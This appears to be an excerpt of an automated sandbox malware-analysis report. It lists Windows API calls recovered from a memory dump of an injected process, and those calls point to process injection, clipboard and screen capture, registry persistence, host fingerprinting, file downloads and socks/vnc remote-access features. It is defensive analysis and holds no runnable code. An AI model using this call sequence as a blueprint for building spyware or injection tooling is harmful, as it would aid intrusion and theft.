Part of subcall function 000BBCAF: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 000BBD11

Part of subcall function 000C8A29: FindFirstFileW.KERNEL32(?,?,?,?), ref: 000C8A5A
Part of subcall function 000C8A29: FindNextFileW.KERNEL32(00000000,?), ref: 000C8AB5
Part of subcall function 000C8A29: FindClose.KERNEL32(00000000), ref: 000C8AC0
Part of subcall function 000C8A29: SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 000C8ACC
Part of subcall function 000C8A29: RemoveDirectoryW.KERNEL32(?), ref: 000C8AD3

SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 000CD39B
CharToOemW.USER32(?,?), ref: 000CD3B7
CharToOemW.USER32(?,?), ref: 000CD3C6

Part of subcall function 000C40F2: wvnsprintfA.SHLWAPI(?,0000026C,?,?), ref: 000C410D

ExitProcess.KERNEL32(00000000), ref: 000CD41C

Part of subcall function 000C4E7B: CharToOemW.USER32(?,?), ref: 000C4EAB
Part of subcall function 000C4E7B: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 000C4F2F

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C51FD, Relevance: 9.1, APIs: 6, Instructions: 74

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 000C521D

Part of subcall function 000C338B: HeapAlloc.KERNEL32(00000008,-00000004,000C4B59,00000000,?,?,?,000C1E08,00000000,000C22ED,?,?,00000000), ref: 000C339C

WaitForSingleObject.KERNEL32(?,00000000), ref: 000C524B
InternetReadFile.WININET(00001000,?,00001000,?), ref: 000C5267
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 000C5282
FlushFileBuffers.KERNEL32(00000000), ref: 000C52A2

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

CloseHandle.KERNEL32(00000000), ref: 000C52B5

Part of subcall function 000C8716: SetFileAttributesW.KERNEL32(00000080,00000080,000CB4CD,?), ref: 000C871F
Part of subcall function 000C8716: DeleteFileW.KERNEL32(?), ref: 000C8729

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C7AF0, Relevance: 9.1, APIs: 6, Instructions: 72

APIs

WindowFromPoint.USER32(?,?), ref: 000C7B0C
SendMessageTimeoutW.USER32(00000000,00000084,00000000,?,00000002,?,?), ref: 000C7B3D
GetWindowLongW.USER32(00000000,000000F0), ref: 000C7B61
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 000C7B72
GetWindowLongW.USER32(?,000000F0), ref: 000C7B8F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 000C7B9D

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C85D0, Relevance: 9.1, APIs: 6, Instructions: 68

APIs

CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 000C85F5
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,000C2D27,?,?,00000000), ref: 000C8608
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,000C2D27,?,?,00000000), ref: 000C8630
ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 000C8648
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,000C2D27,?,?,00000000), ref: 000C8662
CloseHandle.KERNEL32(?), ref: 000C866B

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000B5A94, Relevance: 9.1, APIs: 6, Instructions: 54

APIs

GetUpdateRgn.USER32(?,?,?), ref: 000B5B1C

Part of subcall function 000C262D: WaitForSingleObject.KERNEL32(00000000,000B776D), ref: 000C2635

TlsGetValue.KERNEL32 ref: 000B5AB4
SetRectRgn.GDI32(?,?,?,?,?), ref: 000B5AD4
SaveDC.GDI32(?), ref: 000B5AE4
SendMessageW.USER32(?,00000014,?,00000000), ref: 000B5AF4
RestoreDC.GDI32(?,00000000), ref: 000B5B06

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C4660, Relevance: 9.1, APIs: 6, Instructions: 53

APIs

CryptAcquireContextW.ADVAPI32(000C8C87,00000000,00000000,00000001,F0000040,?,000C8C87,?,00000030,?,?,?,000C91A0,000D3EC0), ref: 000C4679
CryptCreateHash.ADVAPI32(000C8C87,00008003,00000000,00000000,00000030,?,000C8C87,?,00000030,?,?,?,000C91A0,000D3EC0), ref: 000C4691
CryptHashData.ADVAPI32(00000030,00000010,000C8C87,00000000,?,000C8C87), ref: 000C46AD
CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,000C8C87), ref: 000C46C5
CryptDestroyHash.ADVAPI32(00000030,?,000C8C87), ref: 000C46DC
CryptReleaseContext.ADVAPI32(000C8C87,00000000,?,000C8C87,?,00000030,?,?,?,000C91A0,000D3EC0), ref: 000C46E6

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000B6010, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 189

APIs

GetTickCount.KERNEL32(0000271B,00020000,00000000,00002719,00020000,00000000,00000000,000000FF,00000000), ref: 000B610F
GetUserNameExW.SECUR32(00000002,?,00000104), ref: 000B61E6

Part of subcall function 000B70A6: GetVersionExW.KERNEL32(?,?,00000000,00000006), ref: 000B70CA
Part of subcall function 000B70A6: GetNativeSystemInfo.KERNEL32(?), ref: 000B70D8

GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,00000000,000000FF,00000000), ref: 000B6162
GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,000000FF,00000000), ref: 000B61A4

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Part of subcall function 000C34BD: GetSystemTime.KERNEL32(?,?,?,000B60C8,00000000,000000FF,00000000), ref: 000C34C7
Part of subcall function 000C34BD: SystemTimeToFileTime.KERNEL32(?,000000FF,?,?,000B60C8,00000000,000000FF,00000000), ref: 000C34D5

Part of subcall function 000C34E5: GetTimeZoneInformation.KERNEL32(?), ref: 000C34F4

Strings

, xrefs: 000B6218

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000B7125, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64

APIs

ConvertSidToStringSidW.ADVAPI32(?,?), ref: 000B7138

Part of subcall function 000C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000C40CF

LocalFree.KERNEL32(?,.exe,00000000), ref: 000B71C0

Part of subcall function 000C74DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,000B7194,?,?,00000104,.exe,00000000), ref: 000C74F4
Part of subcall function 000C74DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,000B7194,?,?,00000104), ref: 000C7575

PathUnquoteSpacesW.SHLWAPI(?), ref: 000B71A0
ExpandEnvironmentStringsW.KERNEL32(?,000CD23A,00000104), ref: 000B71AD

Strings

.exe, xrefs: 000B7147

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C4F8F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46

APIs

InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 000C4FA6
InternetSetOptionA.WININET(00000000,00000002,000D200C,00000004), ref: 000C4FC5
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000C4FE2
InternetCloseHandle.WININET(00000000), ref: 000C4FEE

Strings

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 000C4F97, 000C4FA5

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C5403, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44

APIs

LoadLibraryA.KERNEL32(urlmon.dll), ref: 000C5414
GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 000C5427
FreeLibrary.KERNEL32(?), ref: 000C5479

Strings

urlmon.dll, xrefs: 000C540D
ObtainUserAgentString, xrefs: 000C5421

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000B748F, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 207

APIs

lstrcmpiA.KERNEL32(?,socks,?,00000000,00000104), ref: 000B74BE
lstrcmpiA.KERNEL32(?,vnc), ref: 000B74D1

Part of subcall function 000C7425: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 000C7444
Part of subcall function 000C7425: CloseHandle.KERNEL32(?), ref: 000C7450

Part of subcall function 000C7477: SetLastError.KERNEL32(0000009B,000C2AC8,00000000,000BBB5F,00000000,000D2AF0,00000000,00000104,76C605D7,00000000), ref: 000C7481
Part of subcall function 000C7477: CreateThread.KERNEL32(00000000,000D2AF0,000D2AF0,000D2AF0,00000000,00000000), ref: 000C74A4

Part of subcall function 000C675E: shutdown.WS2_32(?,00000002), ref: 000C6766
Part of subcall function 000C675E: #3.WS2_32(?), ref: 000C676D

Part of subcall function 000C74BC: WaitForMultipleObjects.KERNEL32(?,000D2AEC,00000001,000000FF), ref: 000C74CE

CloseHandle.KERNEL32(?), ref: 000B76EE

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Part of subcall function 000C6B8E: ReleaseMutex.KERNEL32(00000000,000C3021,?,?,?), ref: 000C6B92

Part of subcall function 000C6444: getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 000C6463
Part of subcall function 000C6444: freeaddrinfo.WS2_32(?,76C53E72,?,?,?,000B7518,?), ref: 000C64B0

Part of subcall function 000C67B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 000C67CC

Part of subcall function 000C6774: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 000C67A7

Part of subcall function 000C666B: select.WS2_32(00000000,?,00000000,00000000,?), ref: 000C66EA
Part of subcall function 000C666B: WSASetLastError.WS2_32(0000274C), ref: 000C66F9

Part of subcall function 000C636E: recv.WS2_32(?,?,00000004,00000000), ref: 000C6392

Part of subcall function 000C338B: HeapAlloc.KERNEL32(00000008,-00000004,000C4B59,00000000,?,?,?,000C1E08,00000000,000C22ED,?,?,00000000), ref: 000C339C

Strings

vnc, xrefs: 000B74CA
socks, xrefs: 000B74B7

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000B9D55, Relevance: 7.7, APIs: 5, Instructions: 202

APIs

Part of subcall function 000C338B: HeapAlloc.KERNEL32(00000008,-00000004,000C4B59,00000000,?,?,?,000C1E08,00000000,000C22ED,?,?,00000000), ref: 000C339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 000B9E0C
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 000B9E37
RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?,?,?,000000FF,?,?,000000FF,?,?,000000FF), ref: 000B9ED7

Part of subcall function 000C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000C40CF

Part of subcall function 000C7607: RegQueryValueExW.KERNEL32(?,?,00000000,?,000C9E26,?,?,?,000C75CD,?,?,00000000,00000004,?), ref: 000C761F
Part of subcall function 000C7607: RegCloseKey.KERNEL32(?,?,000C75CD,?,?,00000000,00000004,?,?,?,?,000C9E26,?,?), ref: 000C762D

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 000B9F7A
RegCloseKey.ADVAPI32(?), ref: 000B9F8D

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Part of subcall function 000C74DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,000B7194,?,?,00000104,.exe,00000000), ref: 000C74F4
Part of subcall function 000C74DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,000B7194,?,?,00000104), ref: 000C7575

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000B8E1B, Relevance: 7.7, APIs: 5, Instructions: 158

APIs

Part of subcall function 000C8C40: PathCombineW.SHLWAPI(000C1F45,000C1F45,?), ref: 000C8C5F

Part of subcall function 000C338B: HeapAlloc.KERNEL32(00000008,-00000004,000C4B59,00000000,?,?,?,000C1E08,00000000,000C22ED,?,?,00000000), ref: 000C339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 000B8E82
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,000000FF,000000FF,?), ref: 000B8F16
GetPrivateProfileIntW.KERNEL32(00000015,?,00000015,?), ref: 000B8F34
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,?,000000FF,?), ref: 000B8F5F
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000,000000FF,?), ref: 000B8F7B

Part of subcall function 000C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000C40CF

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C9224, Relevance: 7.6, APIs: 5, Instructions: 111

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000004,00000080,00000000), ref: 000C9245

Part of subcall function 000C86EF: GetFileSizeEx.KERNEL32(000C925C,000C925C,?,?,?,000C925C,00000000), ref: 000C86FB

ReadFile.KERNEL32(?,?,00000005,00000000,00000000), ref: 000C9286
CloseHandle.KERNEL32(?), ref: 000C9292
ReadFile.KERNEL32(?,?,00000005,00000005,00000000), ref: 000C9301
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 000C9327

Part of subcall function 000C869F: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 000C86B1

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C9959, Relevance: 7.6, APIs: 5, Instructions: 99

APIs

Part of subcall function 000C338B: HeapAlloc.KERNEL32(00000008,-00000004,000C4B59,00000000,?,?,?,000C1E08,00000000,000C22ED,?,?,00000000), ref: 000C339C

GetDIBits.GDI32(00000000,000BDE4B,00000000,00000001,00000000,00000000,00000000), ref: 000C9991
GetDIBits.GDI32(00000000,000BDE4B,00000000,00000001,00000000,00000000,00000000), ref: 000C99A7
DeleteObject.GDI32(000BDE4B), ref: 000C99B4
CreateDIBSection.GDI32(00000000,00000000,00000000,000D2888,?,?), ref: 000C9A24

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

DeleteObject.GDI32(000BDE4B), ref: 000C9A43

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000CA298, Relevance: 7.6, APIs: 5, Instructions: 94

APIs

ResetEvent.KERNEL32(?), ref: 000CA2A6

Part of subcall function 000C338B: HeapAlloc.KERNEL32(00000008,-00000004,000C4B59,00000000,?,?,?,000C1E08,00000000,000C22ED,?,?,00000000), ref: 000C339C

InternetSetStatusCallbackW.WININET(?,000CA24F), ref: 000CA2DB
InternetReadFileExA.WININET ref: 000CA31B
GetLastError.KERNEL32 ref: 000CA325

Part of subcall function 000C6B28: TranslateMessage.USER32(?), ref: 000C6B4A
Part of subcall function 000C6B28: DispatchMessageW.USER32(?), ref: 000C6B55
Part of subcall function 000C6B28: PeekMessageW.USER32(00000000), ref: 000C6B65
Part of subcall function 000C6B28: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 000C6B79

InternetSetStatusCallbackW.WININET(?,?), ref: 000CA389

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Part of subcall function 000C3346: HeapAlloc.KERNEL32(00000008,-00000003,000C36F5,?,?,00000000,000C41E1,?,000C2070,?,?,?,000C4191,?,?,?), ref: 000C3368
Part of subcall function 000C3346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,000C36F5,?,?,00000000,000C41E1,?,000C2070,?,?,?,000C4191,?,?), ref: 000C3379

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000CC49B, Relevance: 7.6, APIs: 5, Instructions: 85

APIs

Part of subcall function 000C262D: WaitForSingleObject.KERNEL32(00000000,000B776D), ref: 000C2635

GetProcessId.KERNEL32(?), ref: 000CC509

Part of subcall function 000C245B: CreateMutexW.KERNEL32(000D2C30,00000001,?,000D2E70,76C605D7,?,00000002,?,76C605D7), ref: 000C24A3
Part of subcall function 000C245B: GetLastError.KERNEL32 ref: 000C24AF
Part of subcall function 000C245B: CloseHandle.KERNEL32(00000000), ref: 000C24BD

Part of subcall function 000C2542: DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 000C2574
Part of subcall function 000C2542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,000C316D,?,00000000,?,?,00000000), ref: 000C25AB
Part of subcall function 000C2542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,000C316D,?,00000000,?,?,00000000), ref: 000C25CB
Part of subcall function 000C2542: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,000C316D,?,00000000), ref: 000C261A

GetThreadContext.KERNEL32 ref: 000CC557
SetThreadContext.KERNEL32(00000000,00000000), ref: 000CC596
VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000), ref: 000CC5AD
CloseHandle.KERNEL32(?), ref: 000CC5B7

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000CB3EC, Relevance: 7.6, APIs: 5, Instructions: 85

APIs

Part of subcall function 000C8C40: PathCombineW.SHLWAPI(000C1F45,000C1F45,?), ref: 000C8C5F

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 000CB437
WriteFile.KERNEL32(000CB3D4,?,00000146,?,00000000), ref: 000CB475
WriteFile.KERNEL32(000CB3D4,?,00000000,?,00000000), ref: 000CB499
FlushFileBuffers.KERNEL32(000CB3D4), ref: 000CB4AD
CloseHandle.KERNEL32(000CB3D4), ref: 000CB4B6

Part of subcall function 000C8716: SetFileAttributesW.KERNEL32(00000080,00000080,000CB4CD,?), ref: 000C871F
Part of subcall function 000C8716: DeleteFileW.KERNEL32(?), ref: 000C8729

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000B5DFB, Relevance: 7.6, APIs: 5, Instructions: 80

APIs

GetWindowInfo.USER32(?,?), ref: 000B5E1A
IntersectRect.USER32(?,?), ref: 000B5E58
IsRectEmpty.USER32(?), ref: 000B5E6A
IntersectRect.USER32(?,?), ref: 000B5E81

Part of subcall function 000B5C8A: GetWindowThreadProcessId.USER32(?,?), ref: 000B5CB4
Part of subcall function 000B5C8A: ResetEvent.KERNEL32(00000010), ref: 000B5D03
Part of subcall function 000B5C8A: PostMessageW.USER32(?,?,?,00000010), ref: 000B5D26
Part of subcall function 000B5C8A: WaitForSingleObject.KERNEL32(00000010,00000064), ref: 000B5D35
Part of subcall function 000B5C8A: ResetEvent.KERNEL32(?,?,?,00000010), ref: 000B5D60
Part of subcall function 000B5C8A: PostThreadMessageW.USER32(?,?,000000FC,?), ref: 000B5D70
Part of subcall function 000B5C8A: WaitForSingleObject.KERNEL32(?,000003E8), ref: 000B5D82
Part of subcall function 000B5C8A: TerminateProcess.KERNEL32(?,00000000,?,00000010), ref: 000B5DA7
Part of subcall function 000B5C8A: IntersectRect.USER32(?,?), ref: 000B5DC7
Part of subcall function 000B5C8A: FillRect.USER32(?,?,00000006), ref: 000B5DD9
Part of subcall function 000B5C8A: DrawEdge.USER32(?,?,0000000A,0000000F), ref: 000B5DED

GetTopWindow.USER32(?), ref: 000B5EB1

Part of subcall function 000C7AC1: GetWindow.USER32(?,00000001), ref: 000C7AE3

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000BBBD5, Relevance: 7.6, APIs: 5, Instructions: 72

APIs

GetCurrentThread.KERNEL32(00000000), ref: 000BBBE0
SetThreadPriority.KERNEL32(00000000), ref: 000BBBE7

Part of subcall function 000C2507: CreateMutexW.KERNEL32(000D2C30,00000000,?,?,?,?,?), ref: 000C2528

Part of subcall function 000C2828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 000C28A1

PathQuoteSpacesW.SHLWAPI(?), ref: 000BBC2A

Part of subcall function 000C262D: WaitForSingleObject.KERNEL32(00000000,000B776D), ref: 000C2635

WaitForSingleObject.KERNEL32(000000C8), ref: 000BBC62

Part of subcall function 000C763A: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,000C9EAB,?,?,00000004), ref: 000C7658
Part of subcall function 000C763A: RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,000C9EAB,?,?,000C9EAB,?,?,00000004,?,00000004), ref: 000C7672
Part of subcall function 000C763A: RegCloseKey.ADVAPI32(00000004,?,?,000C9EAB,?,?,00000004,?,00000004), ref: 000C7681

WaitForSingleObject.KERNEL32(000000C8,?), ref: 000BBC98

Part of subcall function 000C6B8E: ReleaseMutex.KERNEL32(00000000,000C3021,?,?,?), ref: 000C6B92

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000CB062, Relevance: 7.6, APIs: 5, Instructions: 70

APIs

GetClipboardData.USER32(?), ref: 000CB06B

Part of subcall function 000C262D: WaitForSingleObject.KERNEL32(00000000,000B776D), ref: 000C2635

GlobalLock.KERNEL32(00000000), ref: 000CB09F
EnterCriticalSection.KERNEL32(000D3FB4,00000000,00000000), ref: 000CB0DF

Part of subcall function 000CAD5F: EnterCriticalSection.KERNEL32(000D3FB4,?,?,?,000CB052,?), ref: 000CAD7C
Part of subcall function 000CAD5F: LeaveCriticalSection.KERNEL32(000D3FB4,?,?,?,000CB052,?), ref: 000CAD9D
Part of subcall function 000CAD5F: EnterCriticalSection.KERNEL32(000D3FB4,?,?,?,?,000CB052,?), ref: 000CADAE
Part of subcall function 000CAD5F: LeaveCriticalSection.KERNEL32(000D3FB4,?,?,?,000CB052,?), ref: 000CAE47

LeaveCriticalSection.KERNEL32(000D3FB4,00000000,000B4A68), ref: 000CB0F6

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

GlobalUnlock.KERNEL32(?), ref: 000CB109

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C68E0, Relevance: 7.6, APIs: 5, Instructions: 63

APIs

socket.WS2_32(000000FF,00000002,00000000), ref: 000C68F2
WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00020000,00000000,00020000,00000000,00000000), ref: 000C691C
WSAGetLastError.WS2_32 ref: 000C6923

Part of subcall function 000C338B: HeapAlloc.KERNEL32(00000008,-00000004,000C4B59,00000000,?,?,?,000C1E08,00000000,000C22ED,?,?,00000000), ref: 000C339C

WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000C694F

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

#3.WS2_32(?), ref: 000C6963

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C8A29, Relevance: 7.6, APIs: 5, Instructions: 61

APIs

Part of subcall function 000C8C40: PathCombineW.SHLWAPI(000C1F45,000C1F45,?), ref: 000C8C5F

FindFirstFileW.KERNEL32(?,?,?,?), ref: 000C8A5A

Part of subcall function 000C8716: SetFileAttributesW.KERNEL32(00000080,00000080,000CB4CD,?), ref: 000C871F
Part of subcall function 000C8716: DeleteFileW.KERNEL32(?), ref: 000C8729

FindNextFileW.KERNEL32(00000000,?), ref: 000C8AB5
FindClose.KERNEL32(00000000), ref: 000C8AC0
SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 000C8ACC
RemoveDirectoryW.KERNEL32(?), ref: 000C8AD3

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000B5A01, Relevance: 7.6, APIs: 5, Instructions: 56

APIs

GetUpdateRect.USER32(?,?,?), ref: 000B5A88

Part of subcall function 000C262D: WaitForSingleObject.KERNEL32(00000000,000B776D), ref: 000C2635

TlsGetValue.KERNEL32 ref: 000B5A21
SaveDC.GDI32(?), ref: 000B5A51
SendMessageW.USER32(?,00000014,?,00000000), ref: 000B5A61
RestoreDC.GDI32(?,00000000), ref: 000B5A73

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000B5BF6, Relevance: 7.5, APIs: 5, Instructions: 48

APIs

GetCurrentThread.KERNEL32(00000001,?,?,?,?,?,?,?,?,000C30F6), ref: 000B5C03
SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,000C30F6), ref: 000B5C0A
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,000C30F6), ref: 000B5C1C

Part of subcall function 000B54A9: GetWindowInfo.USER32(?,?), ref: 000B5515
Part of subcall function 000B54A9: IntersectRect.USER32(?,?,-00000114), ref: 000B5538
Part of subcall function 000B54A9: IntersectRect.USER32(?,?,-00000114), ref: 000B558E
Part of subcall function 000B54A9: GetDC.USER32(00000000), ref: 000B55D2
Part of subcall function 000B54A9: CreateCompatibleDC.GDI32(00000000), ref: 000B55E3
Part of subcall function 000B54A9: ReleaseDC.USER32(00000000,00000000), ref: 000B55ED
Part of subcall function 000B54A9: SelectObject.GDI32(00000000,?), ref: 000B5602
Part of subcall function 000B54A9: DeleteDC.GDI32(00000000), ref: 000B5610
Part of subcall function 000B54A9: TlsSetValue.KERNEL32(?), ref: 000B565B
Part of subcall function 000B54A9: EqualRect.USER32(?,?), ref: 000B5675
Part of subcall function 000B54A9: SaveDC.GDI32(00000000), ref: 000B5680
Part of subcall function 000B54A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 000B569B
Part of subcall function 000B54A9: SendMessageW.USER32(?,00000085,00000001,00000000), ref: 000B56BB
Part of subcall function 000B54A9: DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 000B56CD
Part of subcall function 000B54A9: RestoreDC.GDI32(00000000,?), ref: 000B56E4
Part of subcall function 000B54A9: SaveDC.GDI32(00000000), ref: 000B5706
